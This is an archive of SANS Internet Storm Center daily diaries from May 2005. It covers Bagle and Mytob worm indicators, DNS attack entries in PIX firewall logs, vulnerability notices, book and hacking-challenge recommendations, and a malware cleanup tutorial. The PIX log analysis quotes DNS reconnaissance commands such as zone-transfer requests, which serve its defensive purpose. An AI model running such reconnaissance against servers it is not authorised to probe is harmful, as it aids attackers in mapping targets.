Published: 2005-05-31

Virus Tuesday: New Bagels, New Mytob. ; qmail pop3 64bit issues

New Bagel Virus(es?)

We have received a few reports that readers are receiving what appears to be
a new version of the Bagle virus in email this morning. The attachments
(so far) appear to be named as a single digit number zip file
(eg: "5.zip" or "7.zip") as a string (eg: "Be_not_jealous.zip") with a
payload of "16_05_2005.exe" or "19_04_2005.exe". The .zip file is
approximately 18k and is 36352 when extracted. Upon execution, this file
will be copied to C:\WINDOWS\System32\winshost.exe
and will then drop another 11k file into

The registry key HKLM/Software/Microsoft/Windows/Current Version/Run is then updated to execute this winshost.exe file at boot.
The laudable VirusTotal has the following to say about the matter:

AntiVir 05.31.2005 Worm/Bagle.gen
AVG 718 05.31.2005 no virus found
Avira 05.31.2005 Worm/Bagle.gen
BitDefender 7.0 05.31.2005 Win32.Bagle.BO@mm
ClamAV devel-20050501 05.31.2005 Worm.Bagle.BB-gen
DrWeb 4.32b 05.31.2005 no virus found
eTrust-Iris 05.31.2005 no virus found
eTrust-Vet 05.31.2005 no virus found
Fortinet 05.30.2005 W32/Mitglieder.CD.gen-tr
Ikarus 2.32 05.31.2005 no virus found
Kaspersky 05.31.2005 no virus found
McAfee 4502 05.30.2005 no virus found
NOD32v2 1.1116 05.31.2005 probably unknown NewHeur_PE virus
Norman 5.70.10 05.30.2005 W32/Downloader
Panda 8.02.00 05.30.2005 Suspect File
Sybari 7.5.1314 05.31.2005 Troj/BagDl-Gen
Symantec 8.0 05.30.2005 Trojan.Tooso.B
VBA32 3.10.3 05.31.2005 suspected of Worm.Bagle.3

Kaspersky Labs have also posted MD5 hashes for these variants at

The two hashes are: f4271a7bd37b7502ecab0ec2964d87c6 and

New Mytob Virus

We're also getting reports of a new Mytob virus. It appears that this
one may be exploiting the MS05-016 vulnerability, as described in this
bugtraq posting:

Signature updates are starting to show up and catch this:

AntiVir 05.31.2005 Worm/Mytob.ED
AVG 718 05.31.2005 no virus found
Avira 05.31.2005 Worm/Mytob.ED
BitDefender 7.0 05.31.2005 Win32.Worm.Mytob.BC
ClamAV devel-20050501 05.31.2005 Worm.Mytob.AS
DrWeb 4.32b 05.31.2005 Win32.HLLM.MyDoom.44
eTrust-Iris 05.31.2005 Win32/Mytob.BC!Worm
eTrust-Vet 05.31.2005 no virus found
Fortinet 05.31.2005 W32/MyTob.BC-mm
Ikarus 2.32 05.31.2005 no virus found
Kaspersky 05.31.2005 Net-Worm.Win32.Mytob.bc
McAfee 4502 05.30.2005 no virus found
NOD32v2 1.1116 05.31.2005 Win32/Mytob.DC
Norman 5.70.10 05.30.2005 no virus found
Panda 8.02.00 05.31.2005 W32/Mytob.DW.worm
Sybari 7.5.1314 05.31.2005 Net-Worm.Win32.Mytob.bc
Symantec 8.0 05.30.2005 no virus found
VBA32 3.10.3 05.31.2005 suspected of I-Worm (double extension)


qmail pop3d remote root exploit (64 BIT ONLY)

The amazing Georgi Guninski has discovered an issue within qmail's pop3
daemon where it is subject to an integer overflow when built on 64 bit
platforms with greater than 8GB of addressable memory. 32 bit platforms
are not affected. Exploit code has been publically released, patches have
not. The few of you running vulnerable systems may want to keep a close
watch on this issue. I find that I cannot reccomend switching software
as I fully expect this sort of 32/64bit overflow bug to be found in many
more places in the future.


Published: 2005-05-30

openrbl.org is back; hackiis6.com is down? ; ezArmor upgrade issue; Memorial Day

openrbl.org is back

We received reports from a couple of folks today that the openrbl.org website is back up. The DNS A records for the site have been missing for a day or so.

hackiis6.com is down?

Windows IT Pro has had a challenge running since early May to try to hack a server running IIS6. The challenge goes through June 8. Yesterday we received reports that the server was no longer reachable. It may not have been hacked though, the issue may be DNS-related. Currently, SOA and NS records for hackiis6.com are non-existant. whois reports that the main DNS servers are ns[123].mdnsservice.com but these server do not appear to be providing data for this domain currently.

ezArmor Upgrade Issue

We received a report from Glenn Jarvis that after upgrading ezArmor to address the VetE.dll security issue (see diary entry from ), he started having problems with his computer running very slowly. The impacted computer is running Windows 98SE. After some troubleshooting, he ended up uninstalling ezArmor and reinstalling it without the latest upgrade and now his computer is running fine.

If anyone else has experienced any issues with the VetE.dll upgrade, we would be interested in hearing about it.

Memorial Day

For everyone in the US, I hope you are having a safe and enjoyable Memorial Day weekend. If the rain holds off in Virginia, we'll be having a barbecue here later this afternoon.


David Goldsmith

Handler On Duty

dgoldsmith _AT_ sans.org
Published: 2005-05-29

Analyzing evidence of DNS attacks in PIX firewall logs; Trojans for industrial espionage; openrbl.org offline?

Trojans for industrial espionage

A reader (thanks, Tal!) has alerted us to a developing story in Israel. It seems as if a number of renowned companies fell victim to an industrial espionage attack through custom-written trojan horses and viruses. Jerusalem Post has more: http://www.jpost.com/servlet/Satellite?pagename=JPost/JPArticle/ShowFull&cid=1117333096614
ISC reader Axel, doing a great job with using Google on the little solid information that has been made available on the incident so far, strongly suspects that the Trojan in question was what Symantec calls <A HREF="http://securityresponse.symantec.com/avcenter/venc/data/trojan.hotword.html">Trojan.Hotword</A>.

openrbl.org offline?

It seems as if the spam sink openrbl.org has dropped off the net. The various orbl.net DNS servers are apparently up and reachable, but the "A" record for openrbl.org itself is gone.

Analyzing evidence of DNS attacks in PIX firewall logs

With the increase of traffic to DNS (port 53) that
<A HREF="http://www.dshield.org/port_report.php?port=53"> DShield</A> is seeing recently, I wanted to find out what the log of a Cisco PIX firewall protecting a DNS server could tell about incoming attacks. The answer, unfortunately, is: very little. But what little there is, is explained below.

The built-in IDS of a PIX firewall can generate four different DNS related log entries. The four alerts are
%PIX-4-400034 IDS:6050 DNS HINFO Request Attack
This alert will go off if somebody requests a HINFO record from your DNS server. The request will still go through, unless you have configured the PIX to drop (#ip audit attack action drop) the offending packet. HINFO requests are very rare, and serve no real purpose other than to set off all sorts of perimeter IDS.
%PIX-4-400035 IDS:6051 DNS Zone Transfer Attack
This alert will trigger whenever someone tries a DNS zone transfer (aka download of all your DNS information) through the PIX. If you are hosting the primary DNS for a zone, and legitimate secondary DNS servers outside of your network are configured to host a copy of your zones, then this signature will fire every time the secondaries update. Yes, not very useful.
%PIX-4-400036 IDS:6052 DNS Zone Transfer from High Port Attack
This likely means that somebody just tried a "dig -t AXFR @yourdnsserver yourdomain.com" against your DNS server. Usually an indication of reconnaissance.
%PIX-4-400037 IDS:6053 DNS Request for All Records Attack
This log entry is the result of a "dig -t ANY" or "set type=ANY" in nslookup. These requests don't happen "by accident" in the wild, but still happen hundreds of times per day on a busy DNS server. My recommendation is to turn this signature off, or to simply and silently collect these log lines without any alerting configured on them. Below are two samples of how the above alerts look like in a real-world PIX log:

May 26 14:45:11 %PIX-4-400034: IDS:6050 DNS host info request
from ATTACKER.231 to COMPANY.9 on interface outside
May 26 14:42:01 %PIX-4-400036: IDS:6052 DNS high zone transfer request
from ATTACKER.231 to COMPANY.9 on interface outside

Besides the built-in IDS, DNS packets can also get caught by other sanity checks built into the PIX firewall. Some examples are shown below.

May 26 16:00:42 %PIX-4-410001: Dropped UDP DNS request from
outside:ATTACKER.231/37467 to inside:COMPANY.9/53; packet
length 5200 bytes exceeds configured limit of 512 bytes

The above log entry suggests that somebody just ran afoul of the DNS packet length restrictions. 512 bytes is the default length restriction set by the "fixup protocol dns" command. In PIX versions >6.3.3, this length restriction can be changed through the "maximum-length" parameter. For PIX 7.0, the command has mutated from "fixup" to "inspect", but is otherwise unchanged. Seeing the above message in your logs does NOT necessarily mean that some nefarious bad guy is playing with your server, packet lengths above 512 bytes DO exist, espeically if EDNS (RFC 2671) is being used -- but a DNS request of 5200 bytes is a bit too much for natural occurrence.

May 26 14:02:23 %PIX-4-410001: Dropped UDP DNS reply from
outside:SOMEDNS.17/53 to inside:COMPANY.240/65233; packet
length 523 bytes exceeds configured limit of 512 bytes

This event can and does happen quite frequently. It means that a DNS request that originated inside your company (eg. on a client, or DNS forwarder) has been replied to with a DNS packet longer than 512 bytes. Especially if the far end (SOMEDNS) is running Windows 2003, chances are that the server will insist on using EDNS, and usually return too long an answer to still squeeze through the PIX. Usually not hostile.

May 26 16:01:33 %PIX-4-410001: Dropped UDP DNS reply from
outside:ATTACKER.231/14431 to inside:COMPANY.9/53; packet
length 560 bytes exceeds configured limit of 512 bytes

Similar to the above, but now our PIX is really confused. Note how the packet went from high port to port 53, and therefore very likely is a DNS request rather than a reply as indicated in the message. This is usually a strong indication that the DNS packet has been tampered with.
%PIX-4-410001:UDP DNS packet dropped due to compression length check
of <n> bytes: actual length:<n1> bytes

This is a PIX log message that I haven't seen in the wild so far. Allegedly, it is being written if a very crafty DNS packet containing a looping pointer is detected by the PIX. If you have sample packets and sample log entries, please submit.
To finish, two samples of the odd ducks among PIX DNS log lines. Note the novel approach Cisco seems to take at math (9 exceeds 63). I haven't gotten to the bottom of this, but as far as I can tell, what they mean is "label length exceeds 63 by 9 characters"

May 26 13:24:33 %PIX-4-410001: Dropped UDP DNS reply from outside:SOMEDNS.17/53
to inside:COMPANY.240/61858; label length 9 bytes exceeds protocol limit of 63 bytes
May 26 16:02:42 %PIX-4-410001:Dropped UDP DNS reply from inside:COMPANY.9/37709
to outside:ATTACKER.231/53; label length 16 bytes exceeds protocol limit of 63 bytes

The first log line above only signifies that an external DNS server has responded to a query originating from your site with a reply containing a host name of which a "label" is longer than 63 characters. A "label" according to the DNS RFC (1035) is any component between dots in a host name. In DNS parlance, isc.sans.org consists of three labels, with length 3-4-3. Getting a response longer than 63 usually happens on "fancy" host names that are especially common when return resolving IP addresses used in IRC networks. Seeing this log entry is quite rare, but not too much cause for concern. Not so for the second sample above. Note how the PIX is dropping a DNS reply sent outbound from our DNS server. The firewall is also sufficently confused to actually cause a swap of the port numbers; packet traces confirm that 53 is inside and 37709 at the attacker's site, as we would expect. So far I've only seen these log entries during a real attack against a DNS server, and they are usually caused by the attacker sending a non-standard packet and the DNS server (rather than swallowing it without reply) sending the packet back flagged as an error. Why the PIX apparently does not catch the inbound attack and only triggers on the outbound reply is still a mystery to me.
One strong caveat: DNS UDP requests can be easily spoofed and can show up in your logs with a different source address than the actual originator. Also, the "ANY" records and "HINFO" requests can be relayed through an arbitrary DNS server that supports query recursion. So, before you take any action against an alleged offender, make sure you got a solid case (packet traces, and a good answer to "Probability that the source address was spoofed
", as you were taught in Mike Poor's class :-)).
If you have other explanations or have seen additional DNS related log entries in your PIX firewall log, please <A HREF="http://isc.sans.org/contact.php"> let me know</A>.

Daniel Wesemann

Email: echo "ebojfm/jtdAhnbjm/dpn" | perl -pe 's/(.)/chr(ord($1)-1)/ge'


Published: 2005-05-28

GAO Report on DHS; ezSTUB; Worm.Gibe.F; BlueTooth Security? ClamAv MACosX

Bluetooth security

Juha-Matti Laurio sent a link about bluetooth security.
A new article "Bluetooth Security Review", i.e. Part 2,
was published at SecurityFocus Infocus which includes "Easy Bluetooth security tips":

GAO report on DHS

GAO published a report on DHS challenges in fulfilling cybersecurity responsibilities.
In brief they state:
"DHS has Initiated Efforts that begin to address its responsibilities but more work remains."

In my personal opinion DHS is facing some tough challenges.
The bureaucracy required to organize such a large group of independently funded and semi-autonomous
departments will nearly always cause such an effort to proceed slowly and potentially never reach its goals.

You might want to add to your SUMMER reading list the "Mythical Man-Month" by Frederick P. Brooks, Jr.
Its a short book of essays on software engineering.
Some of the management principles
can be applied outside of software development.

ClamAV local privilege escalation vulnerability for MACosX.

The advisory can be found here:

Here is their summery:
"Under the Mac OS file system (HFS) files are saved as to parts data and
resource fork.  In ClamAV version 0.80rc4, support was added to copy
both the data and the resource fork when moving a virus infected file.
The mechanism they used was the Mac local system utility ditto.  While
there isn't a security issue with using the "ditto" command itself, the
system() call they use to execute it is insecure."
An update can be found here:

Worm.Gibe.F being reported

Viatcheslav Fedorov received a bit of malware from Microsoft a ``Partner''
He stated it "Smelled like a trojan".
A few minutes later he wrote back stating
"Yep, that's Worm.Gibe.F"
Information on Gibe.F from:

"Gibe is a mass-mailing worm written in Visual Basic.
It disguises itself as a Microsoft security update"


A user wrote in asking about ezStub3.dll.
Fellow handler Tony Carothers answered:
This file is typically linked with the "Adware.Ezula" strain of
spyware/adware.  From Symantec: "Adware.Ezula alters Web pages viewed
in Internet Explorer and can add extra links to certain keywords that
advertisers target. This adware runs under the name TopText."  As with
any other adware, there are several ways to remove this;
Spyware/adware removal tools, such as SpyBot S&D; Some AntiVirus
applications have the ability to prevent, detect, and remove these; or
manually, which is the most difficult and typically not the preferred.
My research discovered this information.
It was "discovered" as one of the many "nice" malware additions
that were scheduled to be installed later during Tom Liston's "follow the bouncing malware II".
If you missed Tom's malware forensics-humor it here:

Information and removal instructions for ezStub3.dll.
CA SecurityAdvisor

SpyBot SandD
I hope everyone has a good weekend.
Those of you celerbrating Memorial Day enjoy yourselves but
PLEASE drive safely both on the roads and the internet.
Donald.Smith hex_to_ascii(40 base16)qwest.com


Published: 2005-05-27

The SPAM People;Thanks;Package Verification

The SPAM People

Do you know anyone that has made a purchase off a SPAM? I've been told these people exist. What maybe 1 in 1,000,000 SPAMs results in a sale. I'm just fascinated by the thought. Do they walk down the street like you and me? Would I recognize one if I saw one? Are they related to the people that watch infomercials not in jest?
Then again I met someone the other day that was actively corresponding with "women" in "Nigeria" that were interested in becoming brides in the US, but had a few checks they needed cashed first. Same person also didn't realize The Onion was satire and not to be taken literally. Sigh.


A big thanks to all of you that have written in with details from your digging around or that have uploaded files, phishing info, suggestions. Its of great benefit for all those that seek to understand.

I wonder how many malware dissectors also liked to take things apart as a child? Old toasters, can openers. Anything with a motor. Never quite could get them all back together. Especially things with springs.

Package Verification

How many of you all verify the integrity of your software before you install it? Where is it coming from? Who wrote it? What changes does it make to your system? Did the package you downloaded contain any "enhancements" insert without the author's knowledge (keyloggers, backdoors, etc).
Answering the first couple of questions just takes an inquisitive desire and a little common sense. Answering the last one takes a little grunt work the right tools to verify the file (rpm, gnupg, md5sum, etc).





For those in the US, have a good, safe holiday this weekend and remember those that have given their lives in battle on Monday.


Robert Danford
SANS Internet Storm Center Handler


Published: 2005-05-26

New poll; DNS spikes; Witty worm analysis; LISTSERV vuln; ZoneAlarm clarification

New poll: Snort interface

Check out the new poll to the right about which Snort
alerting/management interface you like best.

DNS spikes

Some folks have reported strange DNS activity that is occuring in
spikes. The traffic doesn't seem to decode into anything useable
according to the DNS protocols. If you have observed anything strange
in DNS land lately (over UDP), please send over some packet captures.
*joking:* Or it could just be Kaminsky playing around with real-time video
bouncing off public DNS servers. Maybe he's got Episode 3 up there?

Extensive statistical analysis of last year's Witty worm

A new paper has been released that analyzes a huge amount of data from
the Witty worm of March 2004. This paper makes some interesting
conclusions about the initial "Patient 0" and the initial target hit
list that it was seeded with.

The paper: http://www.cc.gatech.edu/~akumar/witty.html

A good article from Rob Lemos at SecurityFocus with some interesting
theories about the author of the worm:

Serious vulnerability in L-Soft LISTSERV

A serous vulnerability was released today by NGS Software that affects
the L-Soft LISTSERV mailing list software. If you run this software,
you are highly recommended to update to the latest version:



ZoneAlarm products that are vulnerable to CA VET bug

We reported earlier this week that several ZoneAlarm products include
the VET library from Computer Associates, which has a serious
vulnerability. Today, ZoneLabs released a list of products that include
the anti-virus engine which contains the vulnerable VET dll:

Affected Products:

* ZoneAlarm Anti-virus

* ZoneAlarm Security Suite

Unaffected Products:

* ZoneAlarm and ZoneAlarm Pro

* Check Point Integrity clients and Integrity Server

* Integrity Clientless Security products


Published: 2005-05-25

Summer/Winter Vacation Book Suggestions and Hacking Challenges

Today’s blog-fest is done…

If you want to read yesterday’s fascinating diary from handler extraordinaire Scott Fendley, click

Update on CA Antivirus Vet Library Vulnerability

Yesterday’s diary mentioned that it could be tough for consumers to determine if they have a vulnerable version of the Vet Library. CA has published detailed directions on how to do this in their advisories, and they’re pretty straightforward. For details, please check out the EZ Antivirus/Armor product support site at

Also, you can look at these detailed instructions for checking product versions: http://crm.my-etrust.com/login.asp?username=guest&target=DOCUMENT&openparameter=89

These links were also included in the original advisory CA sent to
BugTraq, NTBugTraq, SecurityFocus, FrSIRT, Secunia, CERT, US-CERT,
OSVDB, ISS X-Force, SecurityTracker, PacketStorm, Mitre CVE,
SecuriTeam, and Full-Disclosure (among others).

CA pointed out to us: “Our advisory and web site advisory page both list affected versions, how to determine which version you have, and what you need to do to protect yourself. Vet engine 11.9.1 or later indicates that you are protected if you are using any of our corporate products, or the latest major releases of our consumer products (EZ Antivirus 7.x and EZ Armor 3.x). Users of EZ Armor 2.4.4 should upgrade to v3.1. This is of course a free upgrade for all licensed users.”

A Little Websense Trouble with Google and Other Redirect Issues

Reader Hal Logan wrote in to tell us that his websense proxy started blocking users this morning when they clicked on Google search results done through the Google search bar, or when Google had set a cookie in the browser. It appears that when a user searched for “Internet Storm Center”, the Google search bar (or regular Google with the cookie) gave results that pointed to Google, but with a redirect to isc.sans.org. Given this unexpected redirect result, websense filtered this as being “Phishing or other Fraud.” To handle this, Hal and his team had to put google.com in a whitelist for their Websense systems. Thanks for the heads up!

UPDATE: Christian Wyglendowski (type that 3 times fast) sent us a phish message that included a URL with a redirect off of a server in the zdnet.com domain going to the phisher’s bogus website. The phish dudes must be thinking that URL/URI blocklists will let the request to zdnet through. As of now, it looks like the zdnet folks have disabled the redirector. Watch for more of this redirection nastiness in the near future!

Books for Summer/Winter Vacation/Holiday

I was dreaming when I wrote this.

Forgive me if it goes astray.

But when I woke up this morning,

I was shocked to see the end of May!

Yes, folks, the end of May is upon us. Before long, those of us in the Northern Hemisphere will be lazily frolicking at the beach and enjoying Summer barbeques. Readers in the Southern Hemisphere will soon enjoy hot chocolate at the ski lodge, NOP sledding with the kiddies, and snowball fights in places like the Australian Outback, the Brazilian Rainforests, and Sub-Saharan Africa. With a little time off for vacation/holiday, I like to curl up with an engrossing information security book, as I’m sure all of you do as well.

But, new infosec books are released all the time, and it can be hard to keep up with the latest and greatest. Not all of us have a
ability to devour, analyze, and comment intelligently on each and every book our industry churns out.

Today, we asked for help in creating a summer reading list of infosec books. We asked for tomes that have majorly changed your life, or significantly influenced your thinking. PLEASE DON’T SEND ANY MORE SUGGESTIONS… WE’RE FULL NOW. ; )

Also, please note that we asked folks not to mention my own books, because my adding those to this list would be
. ; )

1) Christopher Croad has a stellar recommendation: _The_Shellcoders_Handbook_: Discovering and Exploiting Security Holes. Chris writes:

“After getting my first peek of the workings of buffer overflows in SANS SEC504, I became somewhat...well... obsessed with the topic. This book has helped to open even more doors on the topic for me, mainly because I have had to read and study other material just to comprehend the tome. A newer book (Category B), it is (at least for me) somewhat advanced, and has taken a bit of effort to get through, but it has been worth the time spent.” –- Chris Croad

2) Richard R. Carlin has a recommendation for a book I have not read, but which sounds pretty interesting: _The_Process_of_Network_Security_ by Thomas A. Wadlow. Richard writes:

“Well, this book certainly falls into the ‘A’ category because after reading it I became a believer in the ‘process’ of security over the paranoid fortress mentality I'd had previously. It is a corporate security professional must-read.” -– Richard R. Carlin

3) Chris Compton, a brilliant guy whom I respect very much, recommends _Spec_Ops:_Case_Studies_in_Special_Operations_Warfare:_Theory_and_Practice_ by William H. McRaven. Although I haven’t personally read it, I’m definitely going to add it to my own summer reading list! Chris writes:

“While not directly about information security, this book develops a theoretical model for small-unit asymmetrical operations that has direct implications for the successful planning and implementation of InfoSec objectives. The books is engagingly and concisely written, using examples of both successful and failed missions to identify key elements of success in a tactical environment. I've found that these principles directly and neatly map to the InfoSec mission, where we have small, highly-skilled teams engaging a much larger opposing force of u1+r4 1337 script kiddies and black-hats.” –- Chris Compton

4) Brian sent in a recommendation for a non-technical infosec book that I totally loved. It’s a classic in our field, and if you haven’t read it yet, I both feel sorry for and envy you. I feel sorry for you because you’ve missed it so far, but I envy you for getting to experience that exciting wonder at first reading it! The book is _The_Cuckoo’s_Egg_, by Clifford Stoll. Brian writes:

“This book, while technologically ancient, is still an entertaining read about tracking bad guys through the maze. It covers (sometimes) less than helpful telecom/ISPs, open networks (universities) and attacks through private govt networks. All still relevant in today's infosec world.” -- Brian

5) Terence E. Shelton has a recommendation that I recommend all the time as well: _The_Art_of_War_ by Sun Tzu. If you haven’t read this with an infosec frame of mind, you must do so! This summer is your chance… Make a commitment to doing it! You’ll be pleased you did so. Terence writes:

“I view [this book] as the original security book. It is not an easy read, but I enjoy pondering its applicability to today’s challenges while laying around on lazy summer vacation days. (Of course, even my own kids think I’m weird.” -- Terence E. Shelton… Welcome to the club, Terence. : )

6) Brian Coyle, GCIA, recommends _The_Soul_of_a_New_Machine_ by Tracy Kidder. I haven’t read this one myself yet, but it sounds intriguing. Brian writes:

“This Pulitzer winner delves into the design and construction of a new computer; hardwiring circuits, writing emulation code, debugging setbacks – a perfect diversion for the InfoSec professional! I dig this out whenever I feel overworked or need a break.” -– Brian Coyle.

7) Gary Hinson recommends a book I haven’t heard of, but which sounds pretty cool. It’s called _Testing_Computer_Software_ by Cem Kaner, Jack Falk, and Hung Quoc Nguyen. According to Gary:

“This book proves beyond doubt that it *is* possible to write an informative yet enjoyable textbook. I stil lfind it an extremely useful gued to systems testing as part of numerous information security management and IT audit assignments. Their description of the internal politics that surrounds the testing process definitely rings true.” – Gary Hinson

8) Chris Byrd recommends _Inside_the_Security_Mind:_Making_the_Tough_Decisions_ by Kevin Day. Chris says:

“This book is a must-read for new and seasoned InfoSec professionals alike. It presents a simple list of rules and ideas that encompass why even well funded and well staffed security efforts can fail. Kevin Day presents this information in a likeable, easy-to-read manner.” -- Chris Byrd

9) Danny Quist has a great great great recommendation: _Hacking:_The_Art_of_Exploitation_ by Jon Erickson. Any book that numbers its chapters in Hex is alright by me!! : ) According to Danny:

“This book contains hands-on technical information on all sorts of exploitation methods and techniques. This isn’t a defense book so much as offense. Understanding the deep, dark technical side of the vulnerabilities is an important part for defensive computing.” – Danny Quist

10) Andre’ M. Di Mino cites another one of my favorites: _Know_Your_Enemy_ by the Honeynet Project. That’s a fine tome, my friend. Andre’ (who really does have an apostrophe in the first name) says:
“When I read this book several years ago, it truly motivated me to learn as much as I could about the offensive maneuvers in the infosec war, rather than just the defensive tactics. Reading this book provided me with a great springboard into studying more about data analysis, forensics, honeypots, IDS, and firewalls….” – Andre’ M. Di Mino

11) Jerry Hailey cited one of my all time favorite non-tech books: _The_Code_Book_ by Simon Singh. Jerry himself didn’t describe the book, but I’m telling you… this one is awesome. It’s a history of cryptography and cryptanalysis and a description of how the two influence history, from ancient times to today. It’s great, and Simon Singh is a marvelous author. I loved his other book, _Fermat’s_Enigma_, and have added his new book on cosmology, _Big_Bang_ to my own Summer reading list!

12) Andreas cites a must-have reference book for the shelf: _TCP/IP_Illustrated,_Volume_1:_The_Protocols_. Andreas writes: “There’s no better guide to TCP/IP than this book… I still use it in my everyday work.” -- Andreas.

13) Lucky thirteen goes to Charles Hamby, who points out the great book _Intrusion_Signatures_and_Analysis_ by Cooper, Northcutt, Fearnow (not yesterday, not tomorrow, but fear right NOW), and Frederick. Charles writes: “I picked up this book when it first came out. It was very technical and I had to read it several times… You could say that this really was what turned me on to InfoSec.”

14) Ray Ellington mentioned a book that sounds fascinating, but could be pretty scary: _Aggressive_Network_Self_Defense_ by Neil R. Wyler. The book has caused quite a stir, based on its analysis of potential strike back options. I’ll be reading it this summer myself. Ray says:
“This book… changed my thinking in a big way. I don’t think I’ll go so far as to implementing the strike-back methods mentioned in the book, but it gave me insight into what ‘could’ be done… The hacking techniques which take place in the fictitious stories are very advanced and realistic, which make for a fun read.” – Ray Ellington

15) Robert Arrison points us to _Network_Security:_A_Beginner’s_Guide_ by Eric Maiwald, explaining that, “No matter how far you are into security, you would be surprised as to how much you forgot… This book runs the gamut on all things security…”

16) Matthew C. Huntley mentioned, _Who_Moved_My_Cheese?_ by Johnson and Blanchard. This touching allegory contains various business lessons, and according to Matthew, it is, “essential for keeping your sanity.”

Hacking Challenges: Know Any Good Ones?

Another topic very near and dear to my heart is the hacking challenges and Capture the Flag events various organizations set up on the Internet. These games involve one or more Internet accessible servers run by the challenge organizers that you are called upon to hack. Fun, mayhem, and sometimes prizes ensue. I frequently get asked about which ones are best. My favorites games like this include something for everyone: simple challenges for newbies ranging all the way up to very complex hacking designed for freakazoid geniuses (there ya go… Soon you’ll be able to Google up: freakazoid “Internet Storm Center”!).

We asked to hear from you about challenges that you’ve actually played and enjoyed… not ones that you’ve heard about or Googled up. Any of us can simply Google on “Hacking Challenges”. PLEASE DON’T SEND ANY MORE SUGGESTIONS… WE’RE FULL NOW HERE AS WELL. ; )

I) Four great challenges at the
. These wonderful challenges range from easy to quite tricky. Lots of fun!

sponsored by WindowsITPro.

III) Alex Everett writes in about this challenge, which looks fantastic:

“By far my favorite hacking challenge site is www.hackthissite.org. There are so many available hacking areas from web application attacks, SQL Injection, encryption/decryption, disassembly, etc. They also sponsor a real hack challenge entitled ‘root this box’ where secured servers such as a brickserver reside. Once you sign up you can compete in the challenges and earn points. They also have extensive forums and chat rooms. I suggest you mention this site. I think that it can be very useful to security analysts and pen testers.” –- Alex Everett

IV) Mark Pettifor brings up something cool from the cobwebs of history, which is apparently still alive today:

“Your request for ‘capture the flag’ programs reminded me of the original ‘Core Wars’ article in Scientific American that I read over 20 years ago. Apparently a modern version of Core Wars is still going on. Here's a short article describing the older Core Wars:
http://www.koth.org/info/greg_lindahl_corewars.html . If you go to the root of the web site, you'll find out more about the modern Core Wars being played.” –- Mark Pettifor

V) Brian Coyle, of “The Soul of the New Machine” recommendation fame, cites the Honeynet Project as a great source of challenges with their Scan of the Month, at www.honeynet.org. Indeedy! It’s got some great stuff, including Brian’s own work on Scan #29 at http://honeynet.org/scans/scan29/

VI) James Walden has created a Capture the Flag environment you can download, and has included target server filesystems (RH 9.0 images for User Mode Linux) and the source code of his Scorebot! All of this and more is available for free at www.eecs.utoledo.edu/~jwalden/ctf/

Thanks for reading--

--Ed Skoudis

Handler On Duty


ed (the “at” symbol… that SHIFT+2 thingy) intelguardians.com


Published: 2005-05-24

Update: Paypal Phish Conditioning; DNS Denial of Service Vulnerability; CA Vet Library Vulnerability; Combating Windows Malware Tutorial

<H3>Update: Paypal Phish Conditioning

Cory Altheide would like to thank the many readers who sent in their stories of experiencing activity similar to what was described in . He'd also like to request that anyone who has copies of the phishing emails sent soon after receiving an unsolicited password reset request send them in via the ISC .

<H3>DNS Denial of Service Vulnerability

Earlier today, the NISCC released an advisory that involves a problem with some implementations of DNS. The vulnerability occurs during a recursion process used to decompress compressed DNS messages. Using specially crafted DNS packets, it is possible to cause vulnerable DNS servers to abnormally terminate. Later this afternoon, Cisco and Secunia both issued similar advisories which show some of the Cisco products that are vulnerable to this issue. For more information on this, please see the below URLs:



<H3>Computer Associates Antivirus Vet Library Vulnerability

Alex Wheeler recently released a paper detailing a flaw in the Vet library that many of the CA products and other OEM products use to provide antivirus scan capabilities. According to CA, most of their product have the ability ot update for this automatically since May 3rd. Other companies that use this library should have patches forthcoming.

As this library is used in personal firewall suites like CA's eZ Armor and ZoneLab's ZoneAlarm, I am recommending that this issue be addressed quickly. (This issue conjures up some not-so-fond memories involving the criticality of the Blackice ICQ parser problem used by the Witty worm last year.)

Update (2330UTC) - One of our readers, Glenn Jarvis, noted that the versions of the CA EZ products are hard for most average consumers to compare against the list of vulnerable versions. In the list provided by CA, eZ Armor has many versions that are vulnerable. Using Regedit, Glenn was able to determine that his version was in fact 2.4.4, which was one of the vulnerable versions. However, if you attempt to look at the version numbers looking at the normal GUI based routes from the tray icon, you will see module numbers like

EZ Firewall Version 4.5.585.000

EZ Antivirus Version

EZ Antivirus Engine
Most consumers are not going to have the knowledge to look for the version number in the registry. And it appears that CA does not make it any easier to determine the versions of this product. In addition, Glenn noted that it appears to be possible to download separate components for either the antivirus pieces, or the firewall and miss a vulnerable library installed on the computer. I hope that CA will provide a method that their users can use to assess their risk better.

For more information on this, please see the below URLs:

<H3>Combating Windows Malware Tutorial (using WinXP Pro)

Earlier today, I received a note on one of the mailing lists I monitor asking for help trying to remove a virus off of a computer on his network. His antivirus software was detecting malware on his computer and was cleaning much of this junk out of the \Windows\System32 directory, but periodically these files would get recreated. So he was ending up in this cycle of the antivirus software removing the files and something else putting them back.

As I work in an academic environment, I have seen this happen a lot with various botnet files and spyware. So I shared with this technician how I have gone about getting the system stable again. Before I proceed in my "tutorial", let me note one thing. THIS IS NOT THE WAY TO CLEAN A SYSTEM THAT HAS BEEN COMPROMISED. This is just a way to stabilize a system enough that you can backup user data prior to a complete reinstall or re-image. If you use this procedure as a way to "clean" a system, be aware that the process is not perfect and can be defeated. So in all cases, I believe it to be best to use this as a stop gap measure one can use until you can do what really needs to be done. (Think of this as placing a tourniquet on a limb before transporting the victim to a hospital. This is a field procedure to stop the "bleeding" only.)

The tools I am using and many of the Spyware and Antivirus cleaners work fine in safe mode. Some will require you to be in multi-user mode. It is also recommended that you turn off System Restore. To disable System Restore go to Start Menu -> Settings -> Control Panel -> System -> System Restore tab. You can check the box to disable the restore, and uncheck it to re-enable it at the end.

First, you need to have the right tools available. I have a CD handy which has a number of tools including major patches from MS, AntiVirus software, Spyware removal tools, personal firewall software and various other useful things. (Note to self: put a list of the field kit in a future diary.) For the moment, I am going to mostly use 4 tools in this discussion. I leave it to the reader to understand how to use their specific antivirus and spyware removal tools and when to use them in the discussion. The main 4 tools I use are Autoruns, Process Explorer and TCPView from SysInternals ( http://www.sysinternals.com/ntw2k/utilities.shtml ) and BHODemon from Definitivesolutions.com ( http://www.definitivesolutions.com/bhodemon.htm ).

Second, boot the computer to safe mode. Once you are in safe mode, run Autoruns. This utility will show you all of the various programs that are being started from the various locations in the registry and the Start Menu. Generally these and the Services are the first things that are run at boot time. So I uncheck pretty everything with few exceptions. The main ones I never touch are

* Userinit Logon Application C:\Windows\system32\userinit.exe

* Windows Explorer C:\Windows\explorer.exe

* Any wireless, mouse, touchpad specific apps for your computer

* Antivirus and personal firewall apps
